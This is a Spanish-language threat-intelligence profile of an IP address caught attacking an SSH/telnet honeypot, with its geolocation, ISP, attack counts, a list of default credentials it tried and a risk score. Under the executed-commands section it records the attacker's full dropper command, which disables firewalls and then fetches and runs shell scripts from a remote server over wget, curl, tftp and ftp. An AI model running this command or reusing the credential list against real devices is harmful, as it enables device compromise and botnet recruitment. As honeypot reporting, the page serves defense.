Amenaza Activa • MEDIO
176.65.148.214
Pais de Origen🇳🇱 Paises Bajos
Primera Deteccion13/3/2026
Ultima Actividad8/4/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
659
Ataques Totales
🔌
2
Puertos
📡
1
Tipos Ataque
🦠
2
Malware
Geolocalizacion
- Pais
- 🇳🇱 Paises Bajos
- Ciudad
- Eygelshoven
- ASN
- AS51396
- ISP
- Pfcloud UG (haftungsbeschrankt)
Tipos de Ataque
ssh_telnet_honeypot
Puertos Atacados
2223
Malware Asociado
Credenciales Intentadas
🔐root/admin
3x🔐root/password
2x🔐root/default
2x🔐telnet/telnet
2x🔐admin/password
2x🔐cisco/cisco
2x🔐service/service
1x🔐netgear/netgear
1x🔐apc/apc
1x🔐root/root
1x🔐D-Link/admin
1x🔐root/vizxv
1x🔐asus/admin
1x🔐oracle/oracle
1x🔐root/666666
1xComandos Ejecutados
$
pkill iptables -9; pkill firewalld -9; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; busybox wget curl -o sshbins.sh http://88.214.20.14/sshbins.sh;curl -o sshbins.sh http://88.214.20.14/sshbins.sh; wget http://88.214.20.14/sshbins.sh; chmod 777 sshbins.sh; sh sshbins.sh; tftp 88.214.20.14 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 88.214.20.14; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 88.214.20.14 ftp1.sh ftp1.sh; sh ftp1.sh1x$
wget curl -o sshbins.sh http://88.214.20.14/sshbins.sh1xExposicion segun Shodan InternetDBShodan
Datos de InternetDB, actualizacion no en tiempo real
Puertos
22
Hostnames
176.65.148.214.ptr.pfcloud.network
CPEs
cpe:/o:canonical:ubuntu_linuxcpe:/a:openbsd:openssh:8.9p1
Evaluacion de Riesgo
55
/100
BajoMedioAltoCritico